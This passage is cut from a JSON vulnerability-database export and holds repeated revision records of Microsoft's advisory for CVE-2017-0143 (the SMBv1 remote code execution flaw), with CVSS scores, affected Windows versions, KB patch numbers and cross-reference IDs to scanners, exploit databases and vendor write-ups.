["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-11T22:53:48", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-11T22:53:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB4012212", "KB3210720", "KB4012606", "KB4012217", "KB3212646", "KB4012216", "KB4012214", "KBMS16-110, 3187754", "KB3213986", "KB4012598", "KB3205401", "KB3177186", "KB3210721", "KB4012213", "KB4012215", "KB3205409", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T22:53:48", "differentElements": ["msAffectedSoftware"], "edition": 36}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "e82055c0f190318442e2f0bde68f2113", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-12T04:44:31", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-11T22:53:48", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-11T22:53:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB4013198", "KB3177186", "KB4013429", "KB3210721", "KB4012606", "KBMS16-110, 3187754", "KB4012214", "KB4012212", "KB3213986", "KB3205401", "KB4012213", "KB3212646", "KB3210720", "KB4012215", "KB4012217", "KB3205409", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-12T04:44:31", "differentElements": ["msAffectedSoftware"], "edition": 37}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": 